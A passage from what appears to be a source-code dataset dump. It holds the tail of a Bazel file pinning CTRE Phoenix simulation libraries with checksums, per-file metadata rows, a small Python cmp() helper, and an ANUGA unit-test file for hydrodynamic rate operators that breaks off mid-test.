build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_com_ctre_phoenix_sim_simtalonfx_linuxx86-64",
url = "https://maven.ctr-electronics.com/release/com/ctre/phoenix/sim/simTalonFX/5.20.2/simTalonFX-5.20.2-linuxx86-64.zip",
sha256 = "56c45b9d6511748f34017f90608e81d19209ce78a1e943683bcf7d6f2ec0ea35",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_com_ctre_phoenix_sim_simtalonfx_osxx86-64",
url = "https://maven.ctr-electronics.com/release/com/ctre/phoenix/sim/simTalonFX/5.20.2/simTalonFX-5.20.2-osxx86-64.zip",
sha256 = "0e3f33535f34c1977fef882351bed9e60279e67be8685c52a07601aa0035c318",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_com_ctre_phoenix_sim_simtalonsrx_windowsx86-64",
url = "https://maven.ctr-electronics.com/release/com/ctre/phoenix/sim/simTalonSRX/5.20.2/simTalonSRX-5.20.2-windowsx86-64.zip",
sha256 = "80f8684b410ddaf18d1078ca909a2e4f121b7fa32d7cffd366ea0d0600f0640e",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_com_ctre_phoenix_sim_simtalonsrx_linuxx86-64",
url = "https://maven.ctr-electronics.com/release/com/ctre/phoenix/sim/simTalonSRX/5.20.2/simTalonSRX-5.20.2-linuxx86-64.zip",
sha256 = "b595daa77385e4ea411ae9969b4fb3e464a0233704589c747a77db018c331a56",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_com_ctre_phoenix_sim_simtalonsrx_osxx86-64",
url = "https://maven.ctr-electronics.com/release/com/ctre/phoenix/sim/simTalonSRX/5.20.2/simTalonSRX-5.20.2-osxx86-64.zip",
sha256 = "fcd9ce46485cee96669b5c13e2f7bf4815647436055c43eba3620894aebcda30",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_com_ctre_phoenix_sim_simvictorspx_windowsx86-64",
url = "https://maven.ctr-electronics.com/release/com/ctre/phoenix/sim/simVictorSPX/5.20.2/simVictorSPX-5.20.2-windowsx86-64.zip",
sha256 = "3d502c3cab301d0bfd12fc30ef4588514c33d755a1841001cf182634c5af7060",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_com_ctre_phoenix_sim_simvictorspx_linuxx86-64",
url = "https://maven.ctr-electronics.com/release/com/ctre/phoenix/sim/simVictorSPX/5.20.2/simVictorSPX-5.20.2-linuxx86-64.zip",
sha256 = "f7305f8480eacf4d429532263a7232a6bee44fb12f1c2eee203fdf46f852b20d",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_com_ctre_phoenix_sim_simvictorspx_osxx86-64",
url = "https://maven.ctr-electronics.com/release/com/ctre/phoenix/sim/simVictorSPX/5.20.2/simVictorSPX-5.20.2-osxx86-64.zip",
sha256 = "2b8f328f7558a12dd7c2dfa47b9a229e970969d018a4ae6fa24f65f702f43ba9",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_com_ctre_phoenix_wpiapi-cpp_linuxathena",
url = "https://maven.ctr-electronics.com/release/com/ctre/phoenix/wpiapi-cpp/5.20.2/wpiapi-cpp-5.20.2-linuxathena.zip",
sha256 = "0ce2dc5dbb69a623e942c43204a2ca9472083ff8c7cb35ca2369a2630fda9c3a",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_com_ctre_phoenix_sim_wpiapi-cpp-sim_windowsx86-64",
url = "https://maven.ctr-electronics.com/release/com/ctre/phoenix/sim/wpiapi-cpp-sim/5.20.2/wpiapi-cpp-sim-5.20.2-windowsx86-64.zip",
sha256 = "39f7440688040829b645562c4329788dcdedf9d3d6a80e6fe30a5bb4a12747d5",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_com_ctre_phoenix_sim_wpiapi-cpp-sim_linuxx86-64",
url = "https://maven.ctr-electronics.com/release/com/ctre/phoenix/sim/wpiapi-cpp-sim/5.20.2/wpiapi-cpp-sim-5.20.2-linuxx86-64.zip",
sha256 = "d571b60c6bbaf4e2559c0b3df579ff6dce35c3f5292e389737854aaae25d6fb7",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_com_ctre_phoenix_sim_wpiapi-cpp-sim_osxx86-64",
url = "https://maven.ctr-electronics.com/release/com/ctre/phoenix/sim/wpiapi-cpp-sim/5.20.2/wpiapi-cpp-sim-5.20.2-osxx86-64.zip",
sha256 = "ef679db4752e49f5d3cc354ec9b5cc46cdc9ce04dd296a10a7cf07b34bfbe71e",
build_file_content = cc_library_shared,
)
maybe(
jvm_maven_import_external,
name = "__bazelrio_com_ctre_phoenix_api-java",
artifact = "com.ctre.phoenix:api-java:5.20.2",
artifact_sha256 = "ea09e2c76e2c605187782a42b1c217c1c5b64d9b2b9803045b3a1a0208d7237f",
server_urls = ["https://maven.ctr-electronics.com/release"],
)
maybe(
jvm_maven_import_external,
name = "__bazelrio_com_ctre_phoenix_wpiapi-java",
artifact = "com.ctre.phoenix:wpiapi-java:5.20.2",
artifact_sha256 = "64611652eae1d4da7558e3cb8267f44908670d2e2586895fbc1a1dd3bd099940",
server_urls = ["https://maven.ctr-electronics.com/release"],
)
| 52.125436 | 141 | 0.725401 | 1,706 | 14,960 | 6.05041 | 0.053927 | 0.054253 | 0.108506 | 0.105406 | 0.806142 | 0.799361 | 0.79316 | 0.74937 | 0.734741 | 0.712846 | 0 | 0.177463 | 0.164171 | 14,960 | 286 | 142 | 52.307692 | 0.648033 | 0 | 0 | 0.459649 | 0 | 0.133333 | 0.621858 | 0.32627 | 0 | 0 | 0 | 0 | 0 | 1 | 0.003509 | true | 0 | 0.010526 | 0 | 0.014035 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
3ff6909b15f26268e9a67e399ec5df75467d7ed2 | 44 | py | Python | sim21/support/kludges.py | kpatvt/sim21 | 4cbbfcbef6371d3dc5404429545e003a48c69ba5 | [
"Artistic-2.0"
] | 7 | 2021-08-23T18:46:27.000Z | 2022-01-26T07:10:22.000Z | sim21/support/kludges.py | kpatvt/sim21 | 4cbbfcbef6371d3dc5404429545e003a48c69ba5 | [
"Artistic-2.0"
] | null | null | null | sim21/support/kludges.py | kpatvt/sim21 | 4cbbfcbef6371d3dc5404429545e003a48c69ba5 | [
"Artistic-2.0"
] | null | null | null | def cmp(a, b):
return (a > b) - (a < b)
| 14.666667 | 28 | 0.409091 | 9 | 44 | 2 | 0.555556 | 0.333333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.340909 | 44 | 2 | 29 | 22 | 0.62069 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | false | 0 | 0 | 0.5 | 1 | 0 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
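The `cmp` kludge above re-creates Python 2's removed built-in: `(a > b) - (a < b)` yields -1, 0, or 1. Its typical use in Python 3 is bridging legacy comparison functions to key-based sorting via `functools.cmp_to_key`:

```python
from functools import cmp_to_key


def cmp(a, b):
    # Python 2's built-in cmp(): -1, 0 or 1 according to the ordering of a and b.
    return (a > b) - (a < b)


# A legacy comparison function can still drive sorted() through cmp_to_key:
ordered = sorted([3, 1, 2], key=cmp_to_key(cmp))
```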
b7c0d0e10452de60a2a87af7bbb2b976565e2c4f | 36,342 | py | Python | anuga/operators/tests/test_rate_operators.py | samcom12/anuga_core | f4378114dbf02d666fe6423de45798add5c42806 | [
"Python-2.0",
"OLDAP-2.7"
] | null | null | null | anuga/operators/tests/test_rate_operators.py | samcom12/anuga_core | f4378114dbf02d666fe6423de45798add5c42806 | [
"Python-2.0",
"OLDAP-2.7"
] | null | null | null | anuga/operators/tests/test_rate_operators.py | samcom12/anuga_core | f4378114dbf02d666fe6423de45798add5c42806 | [
"Python-2.0",
"OLDAP-2.7"
] | null | null | null | """ Test environmental forcing - rain, wind, etc.
"""
from __future__ import print_function
from __future__ import division
from builtins import range
from past.utils import old_div
from future.utils import raise_
import operator
import unittest, os
import anuga
import numpy
from anuga import Domain
from anuga import Reflective_boundary
from anuga import rectangular_cross_domain
from anuga import file_function
from anuga.config import netcdf_mode_r, netcdf_mode_w, netcdf_mode_a
from anuga.file_conversion.file_conversion import timefile2netcdf
from anuga.config import time_format
from anuga.fit_interpolate.interpolate import Modeltime_too_early
from anuga.fit_interpolate.interpolate import Modeltime_too_late
from anuga.operators.rate_operators import *
import numpy as num
import warnings
import time
warnings.simplefilter("ignore")
verbose = False
class Test_rate_operators(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
        try:
            os.remove('test_file_function.txt')
        except OSError:
            pass
        try:
            os.remove('test_file_function.tms')
        except OSError:
            pass
def test_rate_operator_simple(self):
from anuga.config import rho_a, rho_w, eta_w
from math import pi, cos, sin
a = [0.0, 0.0]
b = [0.0, 2.0]
c = [2.0, 0.0]
d = [0.0, 4.0]
e = [2.0, 2.0]
f = [4.0, 0.0]
points = [a, b, c, d, e, f]
# bac, bce, ecf, dbe
vertices = [[1,0,2], [1,2,4], [4,2,5], [3,1,4]]
domain = Domain(points, vertices)
#Flat surface with 1m of water
domain.set_quantity('elevation', 0)
domain.set_quantity('stage', 1.0)
domain.set_quantity('friction', 0)
Br = Reflective_boundary(domain)
domain.set_boundary({'exterior': Br})
# print domain.quantities['stage'].centroid_values
# print domain.quantities['xmomentum'].centroid_values
# print domain.quantities['ymomentum'].centroid_values
# Apply operator to these triangles
indices = [0,1,3]
rate = 1.0
factor = 10.0
default_rate= 0.0
operator = Rate_operator(domain, rate=rate, factor=factor, \
indices=indices, default_rate = default_rate)
# Apply Operator
domain.timestep = 2.0
operator()
stage_ex = [ 21., 21., 1., 21.]
# print domain.quantities['stage'].centroid_values
# print domain.quantities['xmomentum'].centroid_values
# print domain.quantities['ymomentum'].centroid_values
assert num.allclose(domain.quantities['stage'].centroid_values, stage_ex)
assert num.allclose(domain.quantities['xmomentum'].centroid_values, 0.0)
assert num.allclose(domain.quantities['ymomentum'].centroid_values, 0.0)
assert num.allclose(domain.fractional_step_volume_integral, factor*domain.timestep*(rate*domain.areas[indices]).sum())
# test timestepping_statistics
stats = operator.timestepping_statistics()
import re
rr = re.findall("[-+]?[.]?[\d]+(?:,\d\d\d)*[\.]?\d*(?:[eE][-+]?\d+)?", stats)
assert num.allclose (float(rr[1]), 1.0)
assert num.allclose (float(rr[2]), 60.0)
def test_rate_operator_negative_rate(self):
from anuga.config import rho_a, rho_w, eta_w
from math import pi, cos, sin
a = [0.0, 0.0]
b = [0.0, 2.0]
c = [2.0, 0.0]
d = [0.0, 4.0]
e = [2.0, 2.0]
f = [4.0, 0.0]
points = [a, b, c, d, e, f]
# bac, bce, ecf, dbe
vertices = [[1,0,2], [1,2,4], [4,2,5], [3,1,4]]
domain = Domain(points, vertices)
#Flat surface with 1m of water
domain.set_quantity('elevation', 0)
domain.set_quantity('stage', 1.0)
domain.set_quantity('friction', 0)
Br = Reflective_boundary(domain)
domain.set_boundary({'exterior': Br})
# print domain.quantities['elevation'].centroid_values
# print domain.quantities['stage'].centroid_values
# print domain.quantities['xmomentum'].centroid_values
# print domain.quantities['ymomentum'].centroid_values
# Apply operator to these triangles
indices = [0,1,3]
#Catchment_Rain_Polygon = read_polygon(join('CatchmentBdy.csv'))
#rainfall = file_function(join('1y120m.tms'), quantities=['rainfall'])
rate = -1.0
factor = 10.0
default_rate= 0.0
operator = Rate_operator(domain, rate=rate, factor=factor, \
indices=indices, default_rate = default_rate)
# Apply Operator
domain.timestep = 2.0
operator()
stage_ex = [ 0., 0., 1., 0.]
step_integral = -6.0
#print domain.quantities['elevation'].centroid_values
#print domain.quantities['stage'].centroid_values
#print domain.quantities['xmomentum'].centroid_values
#print domain.quantities['ymomentum'].centroid_values
#print domain.fractional_step_volume_integral
#print factor*domain.timestep*(rate*domain.areas[indices]).sum()
#increment = factor*domain.timestep*rate*domain.areas
assert num.allclose(domain.quantities['stage'].centroid_values, stage_ex)
assert num.allclose(domain.quantities['xmomentum'].centroid_values, 0.0)
assert num.allclose(domain.quantities['ymomentum'].centroid_values, 0.0)
assert num.allclose(domain.fractional_step_volume_integral, step_integral)
# test timestepping_statistics
stats = operator.timestepping_statistics()
import re
rr = re.findall("[-+]?[.]?[\d]+(?:,\d\d\d)*[\.]?\d*(?:[eE][-+]?\d+)?", stats)
assert num.allclose(float(rr[1]), -1.0)
assert num.allclose(float(rr[2]), -60.0)
def test_rate_operator_negative_rate_full(self):
from anuga.config import rho_a, rho_w, eta_w
from math import pi, cos, sin
a = [0.0, 0.0]
b = [0.0, 2.0]
c = [2.0, 0.0]
d = [0.0, 4.0]
e = [2.0, 2.0]
f = [4.0, 0.0]
points = [a, b, c, d, e, f]
# bac, bce, ecf, dbe
vertices = [[1,0,2], [1,2,4], [4,2,5], [3,1,4]]
domain = Domain(points, vertices)
#Flat surface with 1m of water
domain.set_quantity('elevation', 0)
domain.set_quantity('stage', 10.0)
domain.set_quantity('friction', 0)
Br = Reflective_boundary(domain)
domain.set_boundary({'exterior': Br})
# print domain.quantities['elevation'].centroid_values
# print domain.quantities['stage'].centroid_values
# print domain.quantities['xmomentum'].centroid_values
# print domain.quantities['ymomentum'].centroid_values
# Apply operator to these triangles
indices = [0,1,3]
#Catchment_Rain_Polygon = read_polygon(join('CatchmentBdy.csv'))
#rainfall = file_function(join('1y120m.tms'), quantities=['rainfall'])
rate = -1.0
factor = 10.0
default_rate= 0.0
operator = Rate_operator(domain, rate=rate, factor=factor, \
indices=None, default_rate = default_rate)
# Apply Operator
domain.timestep = 2.0
operator()
stage_ex = [ 0., 0., 0., 0.]
step_integral = -80.0
#print domain.quantities['elevation'].centroid_values
#print domain.quantities['stage'].centroid_values
#print domain.quantities['xmomentum'].centroid_values
#print domain.quantities['ymomentum'].centroid_values
#print domain.fractional_step_volume_integral
assert num.allclose(domain.quantities['stage'].centroid_values, stage_ex)
assert num.allclose(domain.quantities['xmomentum'].centroid_values, 0.0)
assert num.allclose(domain.quantities['ymomentum'].centroid_values, 0.0)
assert num.allclose(domain.fractional_step_volume_integral, step_integral)
# test timestepping_statistics
stats = operator.timestepping_statistics()
import re
rr = re.findall("[-+]?[.]?[\d]+(?:,\d\d\d)*[\.]?\d*(?:[eE][-+]?\d+)?", stats)
assert num.allclose(float(rr[1]), -1.0)
assert num.allclose(float(rr[2]), -80.0)
def test_rate_operator_rate_from_file(self):
from anuga.config import rho_a, rho_w, eta_w
from math import pi, cos, sin
a = [0.0, 0.0]
b = [0.0, 2.0]
c = [2.0, 0.0]
d = [0.0, 4.0]
e = [2.0, 2.0]
f = [4.0, 0.0]
points = [a, b, c, d, e, f]
# bac, bce, ecf, dbe
vertices = [[1,0,2], [1,2,4], [4,2,5], [3,1,4]]
#---------------------------------
#Typical ASCII file
#---------------------------------
finaltime = 1200
filename = 'test_file_function'
fid = open(filename + '.txt', 'w')
start = time.mktime(time.strptime('2000', '%Y'))
dt = 60 #One minute intervals
t = 0.0
while t <= finaltime:
t_string = time.strftime(time_format, time.gmtime(t+start))
fid.write('%s, %f %f %f\n' %(t_string, 2*t, t**2, sin(old_div(t*pi,600))))
t += dt
fid.close()
#Convert ASCII file to NetCDF (Which is what we really like!)
timefile2netcdf(filename+'.txt')
#Create file function from time series
F = file_function(filename + '.tms',
quantities = ['Attribute0',
'Attribute1',
'Attribute2'])
#Now try interpolation
for i in range(20):
t = i*10
q = F(t)
#Exact linear intpolation
assert num.allclose(q[0], 2*t)
if i%6 == 0:
assert num.allclose(q[1], t**2)
assert num.allclose(q[2], sin(old_div(t*pi,600)))
#Check non-exact
t = 90 #Halfway between 60 and 120
q = F(t)
assert num.allclose( old_div((120**2 + 60**2),2), q[1] )
assert num.allclose( old_div((sin(old_div(120*pi,600)) + sin(old_div(60*pi,600))),2), q[2] )
t = 100 #Two thirds of the way between between 60 and 120
q = F(t)
assert num.allclose( old_div(2*120**2,3) + old_div(60**2,3), q[1] )
assert num.allclose( old_div(2*sin(old_div(120*pi,600)),3) + old_div(sin(old_div(60*pi,600)),3), q[2] )
#os.remove(filename + '.txt')
#os.remove(filename + '.tms')
domain = Domain(points, vertices)
#Flat surface with 1m of water
domain.set_quantity('elevation', 0)
domain.set_quantity('stage', 1.0)
domain.set_quantity('friction', 0)
Br = Reflective_boundary(domain)
domain.set_boundary({'exterior': Br})
# print domain.quantities['elevation'].centroid_values
# print domain.quantities['stage'].centroid_values
# print domain.quantities['xmomentum'].centroid_values
# print domain.quantities['ymomentum'].centroid_values
# Apply operator to these triangles
indices = [0,1,3]
rate = file_function(filename + '.tms', quantities=['Attribute1'])
# Make starttime of domain consistent with tms file starttime
domain.set_starttime(rate.starttime)
factor = 1000.0
default_rate= 17.7
operator = Rate_operator(domain, rate=rate, factor=factor, \
indices=indices, default_rate = default_rate)
# Apply Operator
domain.set_time(360.0)
domain.timestep = 1.0
operator()
d = domain.get_time()**2 * factor + 1.0
stage_ex0 = [ d, d, 1., d]
# print d, domain.get_time(), F(360.0)
# print domain.quantities['elevation'].centroid_values
# print domain.quantities['stage'].centroid_values
# print domain.quantities['xmomentum'].centroid_values
# print domain.quantities['ymomentum'].centroid_values
assert num.allclose(domain.quantities['stage'].centroid_values, stage_ex0)
assert num.allclose(domain.quantities['xmomentum'].centroid_values, 0.0)
assert num.allclose(domain.quantities['ymomentum'].centroid_values, 0.0)
assert num.allclose(domain.fractional_step_volume_integral, ((d-1.)*domain.areas[indices]).sum())
domain.set_time(1300.0)
domain.timestep = 1.0
operator()
d = default_rate*factor + d
stage_ex1 = [ d, d, 1., d]
# print domain.quantities['elevation'].centroid_values
# print domain.quantities['stage'].centroid_values
# print domain.quantities['xmomentum'].centroid_values
# print domain.quantities['ymomentum'].centroid_values
assert num.allclose(domain.quantities['stage'].centroid_values, stage_ex1)
assert num.allclose(domain.quantities['xmomentum'].centroid_values, 0.0)
assert num.allclose(domain.quantities['ymomentum'].centroid_values, 0.0)
assert num.allclose(domain.fractional_step_volume_integral, ((d-1.)*domain.areas[indices]).sum())
tmp = numpy.zeros_like(domain.quantities['stage'].centroid_values)
tmp[:] = domain.quantities['stage'].centroid_values
d0 = domain.fractional_step_volume_integral
domain.set_time(-10.0)
domain.timestep = 1.0
operator()
d = default_rate*factor
stage_ex2 = numpy.array([ d, d, 0., d]) + numpy.array(stage_ex1)
assert num.allclose(domain.quantities['stage'].centroid_values, stage_ex2)
assert num.allclose(domain.quantities['xmomentum'].centroid_values, 0.0)
assert num.allclose(domain.quantities['ymomentum'].centroid_values, 0.0)
assert num.allclose(domain.fractional_step_volume_integral, d0+(d*domain.areas[indices]).sum())
# test timestepping_statistics
stats = operator.timestepping_statistics()
import re
rr = re.findall("[-+]?[.]?[\d]+(?:,\d\d\d)*[\.]?\d*(?:[eE][-+]?\d+)?", stats)
assert num.allclose(float(rr[1]), 17.7)
assert num.allclose(float(rr[2]), 106200.0)
    def test_rate_operator_functions_rate_default_rate(self):
        from anuga.config import rho_a, rho_w, eta_w
        from math import pi, cos, sin

        a = [0.0, 0.0]
        b = [0.0, 2.0]
        c = [2.0, 0.0]
        d = [0.0, 4.0]
        e = [2.0, 2.0]
        f = [4.0, 0.0]

        points = [a, b, c, d, e, f]
        # bac, bce, ecf, dbe
        vertices = [[1, 0, 2], [1, 2, 4], [4, 2, 5], [3, 1, 4]]

        domain = Domain(points, vertices)

        # Flat surface with 1m of water
        domain.set_quantity('elevation', 0)
        domain.set_quantity('stage', 1.0)
        domain.set_quantity('friction', 0)

        Br = Reflective_boundary(domain)
        domain.set_boundary({'exterior': Br})

        if verbose:
            print(domain.quantities['elevation'].centroid_values)
            print(domain.quantities['stage'].centroid_values)
            print(domain.quantities['xmomentum'].centroid_values)
            print(domain.quantities['ymomentum'].centroid_values)

        # Apply operator to these triangles
        indices = [0, 1, 3]
        factor = 10.0

        def main_rate(t):
            if t > 20:
                msg = 'Model time exceeded.'
                raise_(Modeltime_too_late, msg)
            else:
                return 3.0 * t + 7.0

        default_rate = lambda t: 3 * t + 7

        operator = Rate_operator(domain, rate=main_rate, factor=factor,
                                 indices=indices, default_rate=default_rate)

        # Apply Operator
        domain.timestep = 2.0
        operator()

        t = operator.get_time()
        d = operator.get_timestep() * main_rate(t) * factor + 1
        stage_ex = [d, d, 1., d]

        if verbose:
            print("Time ", operator.get_time())
            print("Rate ", main_rate(t))
            print(domain.quantities['elevation'].centroid_values)
            print(domain.quantities['stage'].centroid_values)
            print(domain.quantities['xmomentum'].centroid_values)
            print(domain.quantities['ymomentum'].centroid_values)

        assert num.allclose(domain.quantities['stage'].centroid_values, stage_ex)
        assert num.allclose(domain.quantities['xmomentum'].centroid_values, 0.0)
        assert num.allclose(domain.quantities['ymomentum'].centroid_values, 0.0)
        assert num.allclose(domain.fractional_step_volume_integral,
                            ((d - 1.) * domain.areas[indices]).sum())

        domain.set_time(30.0)
        domain.timestep = 1.0
        operator()

        t = operator.get_time()
        d = operator.get_timestep() * default_rate(t) * factor + d
        stage_ex = [d, d, 1., d]

        if verbose:
            print("Time ", operator.get_time())
            print("Rate ", default_rate(t))
            print(domain.quantities['elevation'].centroid_values)
            print(domain.quantities['stage'].centroid_values)
            print(domain.quantities['xmomentum'].centroid_values)
            print(domain.quantities['ymomentum'].centroid_values)

        assert num.allclose(domain.quantities['stage'].centroid_values, stage_ex)
        assert num.allclose(domain.quantities['xmomentum'].centroid_values, 0.0)
        assert num.allclose(domain.quantities['ymomentum'].centroid_values, 0.0)

        # test timestepping_statistics
        stats = operator.timestepping_statistics()
        import re
        rr = re.findall(r"[-+]?[.]?[\d]+(?:,\d\d\d)*[\.]?\d*(?:[eE][-+]?\d+)?", stats)

        if verbose:
            print('Operator Statistics: ', stats)
            print('Extracted values: ', rr)
            print('get_Q: ', operator.get_Q())
            print('Get rate value: ', operator.get_non_spatial_rate())
            print('Areas: ', operator.areas)

        assert num.allclose(float(rr[1]), 97.0)
        assert num.allclose(float(rr[2]), 5820.0)
    def test_rate_operator_functions_spatial(self):
        from anuga.config import rho_a, rho_w, eta_w
        from math import pi, cos, sin

        a = [0.0, 0.0]
        b = [0.0, 2.0]
        c = [2.0, 0.0]
        d = [0.0, 4.0]
        e = [2.0, 2.0]
        f = [4.0, 0.0]

        points = [a, b, c, d, e, f]
        # bac, bce, ecf, dbe
        vertices = [[1, 0, 2], [1, 2, 4], [4, 2, 5], [3, 1, 4]]

        domain = Domain(points, vertices)
        area = numpy.sum(domain.areas)

        # Flat surface with 1m of water
        domain.set_quantity('elevation', 0.0)
        domain.set_quantity('stage', 1.0)
        domain.set_quantity('friction', 0.0)

        Br = Reflective_boundary(domain)
        domain.set_boundary({'exterior': Br})

        verbose = False
        if verbose:
            print(domain.quantities['elevation'].centroid_values)
            print(domain.quantities['stage'].centroid_values)
            print(domain.quantities['xmomentum'].centroid_values)
            print(domain.quantities['ymomentum'].centroid_values)

        # Apply operator to these triangles
        factor = 10.0

        def main_spatial_rate(x, y, t):
            # x and y should be an n by 1 array
            return x + y

        default_rate = 0.0

        operator = Rate_operator(domain, rate=main_spatial_rate, factor=factor,
                                 default_rate=default_rate)

        # Apply Operator
        domain.timestep = 2.0
        operator()

        t = operator.get_time()
        Q = operator.get_Q()
        x = operator.coord_c[:, 0]
        y = operator.coord_c[:, 1]
        rate = main_spatial_rate(x, y, t) * factor
        Q_ex = num.sum(domain.areas * rate)
        d = operator.get_timestep() * rate + 1

        # print "d"
        # print d
        # print area, Q, Q_ex

        stage_ex = num.array([1.0, 1.0, 1.0, 1.0])
        stage_ex[:] = d

        if verbose:
            print(domain.quantities['elevation'].centroid_values)
            print(domain.quantities['stage'].centroid_values)
            print(domain.quantities['xmomentum'].centroid_values)
            print(domain.quantities['ymomentum'].centroid_values)

        assert num.allclose(domain.quantities['stage'].centroid_values, stage_ex)
        assert num.allclose(domain.quantities['xmomentum'].centroid_values, 0.0)
        assert num.allclose(domain.quantities['ymomentum'].centroid_values, 0.0)
        assert num.allclose(Q_ex, Q)

        # test timestepping_statistics
        stats = operator.timestepping_statistics()
        import re
        rr = re.findall(r"[-+]?[.]?[\d]+(?:,\d\d\d)*[\.]?\d*(?:[eE][-+]?\d+)?", stats)

        assert num.allclose(float(rr[1]), 1.33333)
        assert num.allclose(float(rr[2]), 3.33333)
        assert num.allclose(float(rr[3]), 213.33333)
        # operator_5: Min rate = 1.33333 m/s, Max rate = 3.33333 m/s, Total Q = 213.333 m^3/s
    def test_rate_operator_functions_spatial_with_ghost(self):
        from anuga.config import rho_a, rho_w, eta_w
        from math import pi, cos, sin

        a = [0.0, 0.0]
        b = [0.0, 2.0]
        c = [2.0, 0.0]
        d = [0.0, 4.0]
        e = [2.0, 2.0]
        f = [4.0, 0.0]

        points = [a, b, c, d, e, f]
        # bac, bce, ecf, dbe
        vertices = [[1, 0, 2], [1, 2, 4], [4, 2, 5], [3, 1, 4]]

        domain = Domain(points, vertices)
        area = numpy.sum(domain.areas)

        # Flat surface with 1m of water
        domain.set_quantity('elevation', 0.0)
        domain.set_quantity('stage', 1.0)
        domain.set_quantity('friction', 0.0)

        Br = Reflective_boundary(domain)
        domain.set_boundary({'exterior': Br})

        verbose = False
        if verbose:
            print(domain.quantities['elevation'].centroid_values)
            print(domain.quantities['stage'].centroid_values)
            print(domain.quantities['xmomentum'].centroid_values)
            print(domain.quantities['ymomentum'].centroid_values)

        # Apply operator to these triangles
        factor = 10.0

        def main_spatial_rate(x, y, t):
            # x and y should be an n by 1 array
            return x + y

        default_rate = 0.0

        # kludge to make a ghost cell
        domain.tri_full_flag[1] = 0

        operator = Rate_operator(domain, rate=main_spatial_rate, factor=factor,
                                 default_rate=default_rate)

        # Apply Operator
        domain.timestep = 2.0
        operator()

        t = operator.get_time()
        Q_all = operator.get_Q(full_only=False)
        Q_full = operator.get_Q()
        x = operator.coord_c[:, 0]
        y = operator.coord_c[:, 1]
        rate = main_spatial_rate(x, y, t) * factor
        Q_ex_all = num.sum(domain.areas * rate)
        Q_ex_full = num.sum(num.where(domain.tri_full_flag == 1,
                                      domain.areas * rate, 0.0))
        d = operator.get_timestep() * rate + 1

        # print "d"
        # print d
        # print Q_ex_full, Q_ex_all

        stage_ex = num.array([1.0, 1.0, 1.0, 1.0])
        stage_ex[:] = d

        if verbose:
            print(domain.quantities['elevation'].centroid_values)
            print(domain.quantities['stage'].centroid_values)
            print(domain.quantities['xmomentum'].centroid_values)
            print(domain.quantities['ymomentum'].centroid_values)

        assert num.allclose(domain.quantities['stage'].centroid_values, stage_ex)
        assert num.allclose(domain.quantities['xmomentum'].centroid_values, 0.0)
        assert num.allclose(domain.quantities['ymomentum'].centroid_values, 0.0)
        assert num.allclose(Q_ex_all, Q_all)
        assert num.allclose(Q_ex_full, Q_full)
        assert num.allclose(domain.fractional_step_volume_integral,
                            ((d - 1.) * domain.areas * domain.tri_full_flag).sum())

        # test timestepping_statistics
        stats = operator.timestepping_statistics()
        import re
        rr = re.findall(r"[-+]?[.]?[\d]+(?:,\d\d\d)*[\.]?\d*(?:[eE][-+]?\d+)?", stats)

        assert num.allclose(float(rr[1]), 1.33333)
        assert num.allclose(float(rr[2]), 3.33333)
        assert num.allclose(float(rr[3]), 160.0)
    def test_rate_operator_functions_spatial_indices(self):
        from anuga.config import rho_a, rho_w, eta_w
        from math import pi, cos, sin

        a = [0.0, 0.0]
        b = [0.0, 2.0]
        c = [2.0, 0.0]
        d = [0.0, 4.0]
        e = [2.0, 2.0]
        f = [4.0, 0.0]

        points = [a, b, c, d, e, f]
        # bac, bce, ecf, dbe
        vertices = [[1, 0, 2], [1, 2, 4], [4, 2, 5], [3, 1, 4]]

        domain = Domain(points, vertices)

        # Flat surface with 1m of water
        domain.set_quantity('elevation', 0.0)
        domain.set_quantity('stage', 1.0)
        domain.set_quantity('friction', 0.0)

        Br = Reflective_boundary(domain)
        domain.set_boundary({'exterior': Br})

        verbose = False
        if verbose:
            print(domain.quantities['elevation'].centroid_values)
            print(domain.quantities['stage'].centroid_values)
            print(domain.quantities['xmomentum'].centroid_values)
            print(domain.quantities['ymomentum'].centroid_values)

        # Apply operator to these triangles
        indices = [0, 1, 3]
        factor = 10.0

        def main_spatial_rate(x, y, t):
            # x and y should be an n by 1 array
            return x + y

        default_rate = 0.0

        operator = Rate_operator(domain, rate=main_spatial_rate, factor=factor,
                                 indices=indices, default_rate=default_rate)

        # Apply Operator
        domain.timestep = 2.0
        operator()

        t = operator.get_time()
        Q = operator.get_Q()
        x = operator.coord_c[indices, 0]
        y = operator.coord_c[indices, 1]
        rate = main_spatial_rate(x, y, t) * factor
        Q_ex = num.sum(domain.areas[indices] * rate)
        d = operator.get_timestep() * rate + 1

        # print "d"
        # print d

        stage_ex = num.array([1.0, 1.0, 1.0, 1.0])
        stage_ex[indices] = d

        if verbose:
            print(domain.quantities['elevation'].centroid_values)
            print(domain.quantities['stage'].centroid_values)
            print(domain.quantities['xmomentum'].centroid_values)
            print(domain.quantities['ymomentum'].centroid_values)

        assert num.allclose(domain.quantities['stage'].centroid_values, stage_ex)
        assert num.allclose(domain.quantities['xmomentum'].centroid_values, 0.0)
